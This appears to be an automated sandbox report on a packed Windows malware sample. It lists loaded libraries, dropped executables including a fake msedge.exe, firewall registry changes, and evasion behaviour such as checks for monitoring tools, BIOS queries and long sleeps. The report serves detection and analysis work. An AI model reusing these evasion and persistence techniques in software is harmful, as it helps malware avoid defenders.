            Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: rmclient.dllJump to behavior
            Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: uiamanager.dllJump to behavior
            Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: windows.ui.core.textinput.dllJump to behavior
            Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: windows.ui.immersive.dllJump to behavior
            Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: dataexchange.dllJump to behavior
            Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: windows.globalization.dllJump to behavior
            Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: windows.globalization.fontgroups.dllJump to behavior
            Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: fontgroupsoverride.dllJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeFile written: C:\Windows\system.iniJump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: PfBjDhHzvV.exeStatic file information: File size 2969674 > 1048576
            Source: PfBjDhHzvV.exeStatic PE information: Raw size of .boot is bigger than: 0x100000 < 0x2c4000
            Source: Binary string: .objK.pdb source: SearchApp.exe, 0000000F.00000000.1623611969.000001F4AEDB0000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: faawXJQQDELvfTymNiVz.exe, 0000001D.00000002.2629107069.000000000038E000.00000002.00000001.01000000.00000008.sdmp, faawXJQQDELvfTymNiVz.exe, 0000001E.00000002.2632453273.000000000038E000.00000002.00000001.01000000.00000008.sdmp, faawXJQQDELvfTymNiVz.exe, 0000001F.00000000.1802713048.000000000038E000.00000002.00000001.01000000.00000008.sdmp, faawXJQQDELvfTymNiVz.exe, 00000020.00000002.2625174200.000000000038E000.00000002.00000001.01000000.00000008.sdmp, faawXJQQDELvfTymNiVz.exe, 00000021.00000000.1806477058.000000000038E000.00000002.00000001.01000000.00000008.sdmp, faawXJQQDELvfTymNiVz.exe, 00000022.00000002.2626066877.000000000038E000.00000002.00000001.01000000.00000008.sdmp, faawXJQQDELvfTymNiVz.exe, 00000023.00000002.2636248303.000000000038E000.00000002.00000001.01000000.00000008.sdmp
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Code function: 0_2_0129392D Sleep,lstrcpy,LoadLibraryA,GetProcAddress,FreeLibrary,lstrcat,LoadLibraryA,GetProcAddress,CreateThread,CreateThread,Sleep,Sleep,CreateThread,Sleep,Sleep | 0_2_0129392D
            Source: initial sample | Static PE information: section where entry point is pointing to: .boot
            Source: PfBjDhHzvV.exe | Static PE information: section name: (unprintable)
            Source: PfBjDhHzvV.exe | Static PE information: section name: (unprintable)
            Source: PfBjDhHzvV.exe | Static PE information: section name: (unprintable)
            Source: PfBjDhHzvV.exe | Static PE information: section name: (unprintable)
            Source: PfBjDhHzvV.exe | Static PE information: section name: .themida
            Source: PfBjDhHzvV.exe | Static PE information: section name: .boot
            Source: msedge.exe.0.dr | Static PE information: section name: .00cfg
            Source: msedge.exe.0.dr | Static PE information: section name: .gxfg
            Source: msedge.exe.0.dr | Static PE information: section name: .retplne
            Source: msedge.exe.0.dr | Static PE information: section name: CPADinfo
            Source: msedge.exe.0.dr | Static PE information: section name: LZMADEC
            Source: msedge.exe.0.dr | Static PE information: section name: _RDATA
            Source: msedge.exe.0.dr | Static PE information: section name: malloc_h
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Code function: 0_2_007A0000 push ecx; mov dword ptr [esp], ebp | 0_2_007A0028
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Code function: 0_2_007B0000 push 25757BCCh; mov dword ptr [esp], edx | 0_2_007B0097
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Code function: 0_2_007B0000 push 40C40DD0h; mov dword ptr [esp], edx | 0_2_007B0110
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Code function: 0_2_006FD651 push ecx; mov dword ptr [esp], eax | 0_2_006FD658
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Code function: 0_2_006FD651 push ecx; mov dword ptr [esp], eax | 0_2_006FD65C
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Code function: 0_2_0130F217 push ds; ret | 0_2_0130F222
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Code function: 0_2_0130F200 push ss; ret | 0_2_0130F204
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Code function: 0_2_01298060 push eax; ret | 0_2_0129808E
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Code function: 0_2_05B31AB7 push ds; ret | 0_2_05B31AC2
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Code function: 0_2_05B31AA0 push ss; ret | 0_2_05B31AA4
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe | Code function: 29_2_02411AA0 push ss; ret | 29_2_02411AA4
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe | Code function: 29_2_02411AB7 push ds; ret | 29_2_02411AC2
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe | Code function: 30_2_02291AA0 push ss; ret | 30_2_02291AA4
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe | Code function: 30_2_02291AB7 push ds; ret | 30_2_02291AC2
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe | Code function: 31_2_00951AB7 push ds; ret | 31_2_00951AC2
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe | Code function: 31_2_00951AA0 push ss; ret | 31_2_00951AA4
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe | Code function: 32_2_00BF1AB7 push ds; ret | 32_2_00BF1AC2
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe | Code function: 32_2_00BF1AA0 push ss; ret | 32_2_00BF1AA4
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe | Code function: 33_2_00341AB7 push ds; ret | 33_2_00341AC2
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe | Code function: 33_2_00341AA0 push ss; ret | 33_2_00341AA4
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe | Code function: 34_2_01491AA0 push ss; ret | 34_2_01491AA4
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe | Code function: 34_2_01491AB7 push ds; ret | 34_2_01491AC2
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe | Code function: 35_2_0292F217 push ds; ret | 35_2_0292F222
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe | Code function: 35_2_0292F200 push ss; ret | 35_2_0292F204
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe | Code function: 35_2_028B8060 push eax; ret | 35_2_028B808E
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe | Code function: 35_2_02471AA0 push ss; ret | 35_2_02471AA4
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe | Code function: 35_2_02471AB7 push ds; ret | 35_2_02471AC2
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe | Code function: 36_2_00F61AB7 push ds; ret | 36_2_00F61AC2
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe | Code function: 36_2_00F61AA0 push ss; ret | 36_2_00F61AA4
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe | Code function: 37_2_021D1AB7 push ds; ret | 37_2_021D1AC2
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe | Code function: 37_2_021D1AA0 push ss; ret | 37_2_021D1AA4
            Source: PfBjDhHzvV.exe | Static PE information: section name: (unprintable) entropy: 7.775257437192022
            Source: xjjalq.exe.0.dr | Static PE information: section name: .text entropy: 7.985008600362211
            Source: xlroe.exe.0.dr | Static PE information: section name: .text entropy: 7.985007081506113
            Source: taqcpb.exe.0.dr | Static PE information: section name: .text entropy: 7.985007081506113
            Source: winysum.exe.35.dr | Static PE information: section name: .text entropy: 7.98932370060711
            Source: winbwxmuq.exe.35.dr | Static PE information: section name: .text entropy: 7.9828875500354215
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | File created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | File created: C:\taqcpb.exe
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | File created: C:\Users\user\AppData\Local\Temp\xlroe.exe
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe | File created: C:\Users\user\AppData\Local\Temp\winysum.exe
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | File created: C:\Users\user\AppData\Local\Temp\xjjalq.exe
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe | File created: C:\Users\user\AppData\Local\Temp\winbwxmuq.exe

            Boot Survival

            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe - Window searched: window name: RegmonClass
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe - Window searched: window name: FilemonClass
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe - Window searched: window name: PROCMON_WINDOW_CLASS
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe - Registry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile

            Hooking and other Techniques for Hiding and Protection

            Source: PfBjDhHzvV.exe - Binary or memory string: KeServiceDescriptorTable
            Source: PfBjDhHzvV.exe, 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp - Binary or memory string: KeServiceDescriptorTable
            Source: faawXJQQDELvfTymNiVz.exe - Binary or memory string: KeServiceDescriptorTable
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe - Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe - Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe - Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe - Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe - Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\System32\dllhost.exe - Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\dllhost.exe - Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\dllhost.exe - Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exe - Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exe - Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exe - Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exe - Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exe - Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exe - Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exe - Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exe - Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exe - Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exe - Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exe - Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exe - Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exe - Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exe - Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe - Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe - Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe - Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe - Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe - Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe - Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe - Process information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe - Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe - Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe - Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe - Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe - Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe - Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe - Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe - Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe - Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe - Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe - Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe - Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe - Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe - Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe - Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe - System information queried: FirmwareTableInformation
            Source: SearchApp.exe, 0000000F.00000000.1564027510.000001F49B8C1000.00000004.00000001.00020000.00000000.sdmp - Binary or memory string: 44B-8957-A3773F02200E}\WIRESHARK\WIRESHARK.EXE
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe - Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe - Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe - Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe - Thread delayed: delay time: 180000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe - Thread delayed: delay time: 300000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe - Thread delayed: delay time: 360000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe - Thread delayed: delay time: 1800000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe - Thread delayed: delay time: 600000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe - Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe - Thread delayed: delay time: 900000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe - Window / User API: threadDelayed 7218
            Source: C:\Windows\explorer.exe - Window / User API: foregroundWindowGot 885
            Source: C:\Windows\explorer.exe - Window / User API: foregroundWindowGot 869
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe - Window / User API: threadDelayed 1806
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe - Window / User API: threadDelayed 1801
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe - Window / User API: threadDelayed 1775
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe - Window / User API: threadDelayed 1772
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe - Window / User API: threadDelayed 1741
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe - Window / User API: threadDelayed 1722
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe - Window / User API: threadDelayed 391
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe - Window / User API: threadDelayed 1700
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe - Window / User API: threadDelayed 1665
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe - Window / User API: threadDelayed 1667
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe - Window / User API: threadDelayed 1655
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe - Window / User API: threadDelayed 1663
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe - Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec) graph_0-8669
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe - Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe - Dropped PE file which has not been started: C:\taqcpb.exe
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe - Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\xlroe.exe
